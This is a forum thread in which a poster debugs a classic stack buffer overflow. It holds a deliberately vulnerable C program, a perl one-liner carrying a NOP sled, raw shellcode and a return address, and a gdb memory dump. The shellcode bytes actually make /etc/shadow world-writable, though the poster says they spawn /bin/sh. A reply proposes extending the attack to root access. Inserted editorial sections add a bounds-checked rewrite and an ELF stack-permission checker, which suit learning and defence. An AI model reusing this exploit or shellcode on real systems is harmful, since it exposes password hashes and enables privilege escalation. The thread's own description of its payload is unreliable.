Old 07-02-2009   #1 (permalink)
Buffer Overflow (Stack)

Hi,

I've been making some C programs and accidentally found one to be vulnerable; I'm experimenting with exploiting it like an attacker would.

There is no VA randomization. There is no PaX/grsec. It has been compiled with gcc -fno-stack-protector.

The program is crashing with a correct EIP; there seems to be no indication why it is not returning execution to the nopsled and my shellcode as you'd expect. The shellcode is definitely OK (spawns /bin/sh, tested elsewhere).

Below are 1) the source, and 2) a log demonstrating my failing but seemingly correct method.

1) Source
Code:
#include <stdio.h>
#include <string.h>

int main (int argc, char** argv) {
    char name[50];
    strcpy(name, argv[1]);
   
    printf("Hello %s\n", name);

    return 0;
}
2) Log (nopsled entry point bolded in memory dump)

shell:~$ ./vuln `perl -e '$offset = 62; $shellcode = "\x31\xd2\x6a\x0f\x58\x52\x6a\x77\x66\x68\x64\x6f\x68\x2f\x73\x68\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\x68\xb6\x01\x59\xcd\x80\x6a\x01\x58\xcd\x80"; $nopsled = "\x90" x ($offset - (length $shellcode)); $ret = "\xAB\xf6\xff\xbf"; print $nopsled, $shellcode, $ret'`
Hello ��������������������������1�jXRjwfhdoh/shah/etc��fh�ỲjX̀����
Segmentation fault (core dumped)
shell:~$ gdb -c core
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
(no debugging symbols found)
Core was generated by `./vuln ��������������������������1�jXRjwfhdoh/shah/etc��fh�ỲjX̀����'.
Program terminated with signal 11, Segmentation fault.
[New process 8737]
#0 0xbffff6ab in ?? ()
(gdb) x/1000b $esp
0xbffff4a0: 0x00 0x00 0x00 0x00 0x24 0xf5 0xff 0xbf
0xbffff4a8: 0x30 0xf5 0xff 0xbf 0x40 0xfb 0xff 0xb7
0xbffff4b0: 0x01 0x00 0x00 0x00 0x01 0x00 0x00 0x00
0xbffff4b8: 0x00 0x00 0x00 0x00 0x4b 0x82 0x04 0x08
0xbffff4c0: 0xf4 0xcf 0x30 0x00 0x50 0x84 0x04 0x08
0xbffff4c8: 0x40 0x83 0x04 0x08 0xf8 0xf4 0xff 0xbf
0xbffff4d0: 0x0f 0xe4 0xa0 0xea 0x70 0x71 0xc7 0x2d
0xbffff4d8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbffff4e0: 0x00 0x00 0x00 0x00 0xb0 0x39 0x1a 0x00
0xbffff4e8: 0xcd 0x46 0x1c 0x00 0xf4 0xcf 0x1a 0x00
0xbffff4f0: 0x02 0x00 0x00 0x00 0x40 0x83 0x04 0x08
0xbffff4f8: 0x00 0x00 0x00 0x00 0x61 0x83 0x04 0x08
0xbffff500: 0xf4 0x83 0x04 0x08 0x02 0x00 0x00 0x00
0xbffff508: 0x24 0xf5 0xff 0xbf 0x50 0x84 0x04 0x08
0xbffff510: 0x40 0x84 0x04 0x08 0x70 0xe8 0x19 0x00
0xbffff518: 0x1c 0xf5 0xff 0xbf 0x43 0x9f 0x1a 0x00
0xbffff520: 0x02 0x00 0x00 0x00 0x8a 0xf6 0xff 0xbf
0xbffff528: 0x91 0xf6 0xff 0xbf 0x00 0x00 0x00 0x00
0xbffff530: 0xd4 0xf6 0xff 0xbf 0xf7 0xf6 0xff 0xbf
0xbffff538: 0x0a 0xf7 0xff 0xbf 0x15 0xf7 0xff 0xbf
0xbffff540: 0x25 0xf7 0xff 0xbf 0x75 0xf7 0xff 0xbf
0xbffff548: 0xb1 0xf7 0xff 0xbf 0xc3 0xf7 0xff 0xbf
0xbffff550: 0xe3 0xf7 0xff 0xbf 0xf0 0xf7 0xff 0xbf
0xbffff558: 0x91 0xfc 0xff 0xbf 0xbe 0xfc 0xff 0xbf
0xbffff560: 0xee 0xfc 0xff 0xbf 0x42 0xfd 0xff 0xbf
0xbffff568: 0x53 0xfd 0xff 0xbf 0x6b 0xfd 0xff 0xbf
0xbffff570: 0xb8 0xfd 0xff 0xbf 0xd3 0xfd 0xff 0xbf
0xbffff578: 0xe5 0xfd 0xff 0xbf 0xf6 0xfd 0xff 0xbf
0xbffff580: 0x0d 0xfe 0xff 0xbf 0x22 0xfe 0xff 0xbf
0xbffff588: 0x35 0xfe 0xff 0xbf 0x4c 0xfe 0xff 0xbf
0xbffff590: 0x54 0xfe 0xff 0xbf 0x67 0xfe 0xff 0xbf
0xbffff598: 0x93 0xfe 0xff 0xbf 0xa3 0xfe 0xff 0xbf
0xbffff5a0: 0x05 0xff 0xff 0xbf 0x52 0xff 0xff 0xbf
0xbffff5a8: 0x72 0xff 0xff 0xbf 0x7f 0xff 0xff 0xbf
0xbffff5b0: 0x8c 0xff 0xff 0xbf 0xae 0xff 0xff 0xbf
0xbffff5b8: 0xc7 0xff 0xff 0xbf 0xec 0xff 0xff 0xbf
0xbffff5c0: 0x00 0x00 0x00 0x00 0x20 0x00 0x00 0x00
0xbffff5c8: 0x20 0x24 0xa4 0x00 0x21 0x00 0x00 0x00
0xbffff5d0: 0x00 0x20 0xa4 0x00 0x10 0x00 0x00 0x00
0xbffff5d8: 0xff 0xf3 0xeb 0x0f 0x06 0x00 0x00 0x00
0xbffff5e0: 0x00 0x10 0x00 0x00 0x11 0x00 0x00 0x00
0xbffff5e8: 0x64 0x00 0x00 0x00 0x03 0x00 0x00 0x00
0xbffff5f0: 0x34 0x80 0x04 0x08 0x04 0x00 0x00 0x00
0xbffff5f8: 0x20 0x00 0x00 0x00 0x05 0x00 0x00 0x00
0xbffff600: 0x08 0x00 0x00 0x00 0x07 0x00 0x00 0x00
---Type <return> to continue, or q <return> to quit---
0xbffff608: 0x00 0x00 0x19 0x00 0x08 0x00 0x00 0x00
0xbffff610: 0x00 0x00 0x00 0x00 0x09 0x00 0x00 0x00
0xbffff618: 0x40 0x83 0x04 0x08 0x0b 0x00 0x00 0x00
0xbffff620: 0xe8 0x03 0x00 0x00 0x0c 0x00 0x00 0x00
0xbffff628: 0xe8 0x03 0x00 0x00 0x0d 0x00 0x00 0x00
0xbffff630: 0xe8 0x03 0x00 0x00 0x0e 0x00 0x00 0x00
0xbffff638: 0xe8 0x03 0x00 0x00 0x17 0x00 0x00 0x00
0xbffff640: 0x00 0x00 0x00 0x00 0x19 0x00 0x00 0x00
0xbffff648: 0x6b 0xf6 0xff 0xbf 0x1f 0x00 0x00 0x00
0xbffff650: 0xf5 0xff 0xff 0xbf 0x0f 0x00 0x00 0x00
0xbffff658: 0x7b 0xf6 0xff 0xbf 0x00 0x00 0x00 0x00
0xbffff660: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbffff668: 0x00 0x00 0x00 0x95 0x02 0x67 0x1b 0xa1
0xbffff670: 0xc4 0xea 0xee 0x74 0xb8 0xdf 0x99 0xbc
0xbffff678: 0x4e 0x77 0x26 0x69 0x36 0x38 0x36 0x00
0xbffff680: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbffff688: 0x00 0x00 0x2e 0x2f 0x76 0x75 0x6c 0x6e
0xbffff690: 0x00 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff698: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff6a0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff6a8: 0x90 0x90 0x90 0x31 0xd2 0x6a 0x0f 0x58
0xbffff6b0: 0x52 0x6a 0x77 0x66 0x68 0x64 0x6f 0x68
0xbffff6b8: 0x2f 0x73 0x68 0x61 0x68 0x2f 0x65 0x74

Thanks in advance!
caser
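The program in the post is the textbook case: an unbounded strcpy() of argv[1] into a 50-byte stack buffer, with argv[1] never checked for presence either. The following is an added example, not code from the post; it places that pattern next to a hardened form that measures the argument, refuses anything that will not fit together with its terminating NUL, and copies exactly the measured length. The names greet_unchecked, greet_checked, greet_max_len and NAME_LEN are this example's own.

```c
#include <stdio.h>
#include <string.h>

#define NAME_LEN 50   /* same buffer size as the program in the post */

/* The pattern from the post: strcpy() copies argv[1] whatever its length, so an
 * argument of NAME_LEN bytes or more runs past name[] into the saved frame
 * pointer and return address. Kept here for contrast only; nothing calls it. */
void greet_unchecked(const char *arg)
{
    char name[NAME_LEN];
    strcpy(name, arg);
    printf("Hello %s\n", name);
}

/* Hardened form: measure first, reject anything that does not fit together with
 * its terminating NUL, then copy exactly that many bytes.
 * Returns 0 when the greeting was printed and -1 when the argument was rejected. */
int greet_checked(const char *arg)
{
    char name[NAME_LEN];
    size_t n;

    if (arg == NULL)
        return -1;
    n = strlen(arg);
    if (n >= sizeof name) {            /* n + 1 bytes are needed, so n must be < NAME_LEN */
        fprintf(stderr, "argument too long: %zu bytes, limit is %zu\n", n, sizeof name - 1);
        return -1;
    }
    memcpy(name, arg, n + 1);          /* bounded copy, terminator included */
    printf("Hello %s\n", name);
    return 0;
}

/* Longest argument greet_checked() accepts, for callers that want to validate early. */
size_t greet_max_len(void)
{
    return NAME_LEN - 1;
}

int main(int argc, char **argv)
{
    if (argc < 2) {                    /* the post's main() dereferences argv[1] unconditionally */
        fprintf(stderr, "usage: %s NAME\n", argv[0]);
        return 2;
    }
    return greet_checked(argv[1]) == 0 ? 0 : 1;
}
```

Build it without the -fno-stack-protector the post used, so gcc's canary stays in front of the saved return address as a second line of defence, and with -O2 -D_FORTIFY_SOURCE=2, under which glibc replaces the strcpy() in greet_unchecked with a size-checked variant that aborts instead of overflowing a destination whose size the compiler can see.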
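The post lists the mitigations that were switched off (address-space randomization, PaX/grsec, the stack protector) but says nothing about whether the binary's stack is mapped executable, which on Linux is requested through the PT_GNU_STACK program header that gcc and ld write into every ELF file. That marking is worth auditing here: the core dump shows EIP at 0xbffff6ab, which is exactly the address the overwritten return address points to, and the bytes at that address (0x31 0xd2, xor edx,edx) cannot fault, so the SIGSEGV was raised on the instruction fetch itself, which is how a non-executable page behaves. What follows is an added example, not code from the post: a small C checker that parses the ELF header and program header table by the offsets in the ELF specification, handles 32- and 64-bit images in either byte order, and builds its own constructed sample images for testing instead of reading the poster's binary. The names gnu_stack_status, build_sample, rd and wr are this example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PT_GNU_STACK_TYPE 0x6474e551u   /* p_type of the GNU stack-permission marker */
#define PF_X_FLAG         0x1u          /* execute bit in p_flags */

/* Result codes returned by gnu_stack_status(). */
enum stack_status { STACK_BADELF = -1,    /* not an ELF image this checker can parse */
                    STACK_NOEXEC = 0,     /* marker present without PF_X */
                    STACK_EXEC = 1,       /* marker present with PF_X */
                    STACK_UNMARKED = 2 }; /* no marker: kernel applies its legacy default */

/* Read an n-byte unsigned integer at p in the byte order the ELF header declares. */
static uint64_t rd(const unsigned char *p, size_t n, int big_endian)
{
    uint64_t v = 0;
    for (size_t i = 0; i < n; i++)
        v |= (uint64_t)p[i] << (8 * (big_endian ? n - 1 - i : i));
    return v;
}

/* Walk the program headers of an in-memory ELF32 or ELF64 image and report the
 * PT_GNU_STACK marking. Field offsets are those of the ELF specification. */
int gnu_stack_status(const unsigned char *img, size_t len)
{
    int is64, be;
    size_t ehsize, phoff_at, phentsize_at, phnum_at, phsize, flags_at;
    uint64_t phoff, phentsize, phnum;

    if (len < 16 || memcmp(img, "\x7f" "ELF", 4) != 0) return STACK_BADELF;
    if ((img[4] != 1 && img[4] != 2) || (img[5] != 1 && img[5] != 2)) return STACK_BADELF;
    is64 = img[4] == 2;                  /* EI_CLASS: 1 = ELF32, 2 = ELF64 */
    be   = img[5] == 2;                  /* EI_DATA:  1 = little-endian, 2 = big-endian */
    ehsize       = is64 ? 64 : 52;
    phoff_at     = is64 ? 32 : 28;       /* e_phoff, 8 bytes in ELF64, 4 in ELF32 */
    phentsize_at = is64 ? 54 : 42;       /* e_phentsize */
    phnum_at     = is64 ? 56 : 44;       /* e_phnum */
    phsize       = is64 ? 56 : 32;       /* sizeof(ElfNN_Phdr) */
    flags_at     = is64 ? 4 : 24;        /* p_flags sits next to p_type only in the 64-bit layout */
    if (len < ehsize) return STACK_BADELF;
    phoff     = rd(img + phoff_at, is64 ? 8 : 4, be);
    phentsize = rd(img + phentsize_at, 2, be);
    phnum     = rd(img + phnum_at, 2, be);
    if (phentsize < phsize) return STACK_BADELF;
    for (uint64_t i = 0; i < phnum; i++) {
        uint64_t off = phoff + i * phentsize;
        if (off > len || len - off < phsize) return STACK_BADELF;   /* table runs off the image */
        if (rd(img + off, 4, be) == PT_GNU_STACK_TYPE)
            return (rd(img + off + flags_at, 4, be) & PF_X_FLAG) ? STACK_EXEC : STACK_NOEXEC;
    }
    return STACK_UNMARKED;
}

/* Inverse of rd(), used only to build constructed sample images. */
static void wr(unsigned char *p, size_t n, uint64_t v, int big_endian)
{
    for (size_t i = 0; i < n; i++)
        p[big_endian ? n - 1 - i : i] = (unsigned char)(v >> (8 * i));
}

/* Constructed sample: one ELF header plus, when marked != 0, one PT_GNU_STACK
 * program header carrying flags. Not loadable; it exists to exercise the parser.
 * Returns the image length, or 0 if cap is too small. */
size_t build_sample(unsigned char *buf, size_t cap, int is64, int big_endian, int marked, uint32_t flags)
{
    size_t ehsize = is64 ? 64 : 52, phsize = is64 ? 56 : 32, total = ehsize + phsize;

    if (cap < total) return 0;
    memset(buf, 0, total);
    memcpy(buf, "\x7f" "ELF", 4);
    buf[4] = is64 ? 2 : 1;                                          /* EI_CLASS */
    buf[5] = big_endian ? 2 : 1;                                    /* EI_DATA */
    buf[6] = 1;                                                     /* EI_VERSION */
    wr(buf + (is64 ? 32 : 28), is64 ? 8 : 4, ehsize, big_endian);  /* e_phoff: right after the header */
    wr(buf + (is64 ? 54 : 42), 2, phsize, big_endian);             /* e_phentsize */
    wr(buf + (is64 ? 56 : 44), 2, marked ? 1 : 0, big_endian);     /* e_phnum */
    wr(buf + ehsize, 4, PT_GNU_STACK_TYPE, big_endian);            /* p_type */
    wr(buf + ehsize + (is64 ? 4 : 24), 4, flags, big_endian);      /* p_flags */
    return total;
}

int main(int argc, char **argv)
{
    static unsigned char buf[1 << 20];   /* the program header table sits near the file start */
    FILE *f = argc == 2 ? fopen(argv[1], "rb") : NULL;
    int st = STACK_BADELF;

    if (f != NULL) { st = gnu_stack_status(buf, fread(buf, 1, sizeof buf, f)); fclose(f); }
    if (st == STACK_BADELF) { fprintf(stderr, "usage: %s ELF-binary\n", argv[0]); return 1; }
    printf("%s: %s\n", argv[1], st == STACK_EXEC ? "executable stack requested (PF_X set)"
                              : st == STACK_NOEXEC ? "non-executable stack requested"
                              : "no PT_GNU_STACK header");
    return 0;
}
```

Run it as ./checker ./vuln; readelf -lW on the same file shows the identical information in its GNU_STACK line, with flags RW for a non-executable stack and RWE for an executable one. The header only records what the binary asks for: whether the request is honoured depends on the kernel (exec-shield and PaX enforce it on i386; a vanilla kernel needs NX-capable hardware in PAE mode), so the marking is one input to the audit, not the whole answer.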
Old 07-25-2009   #2 (permalink)
Nice tutorial for a basic buffer overflow... we can develop this into gaining root access with a buffer overflow...
kiddies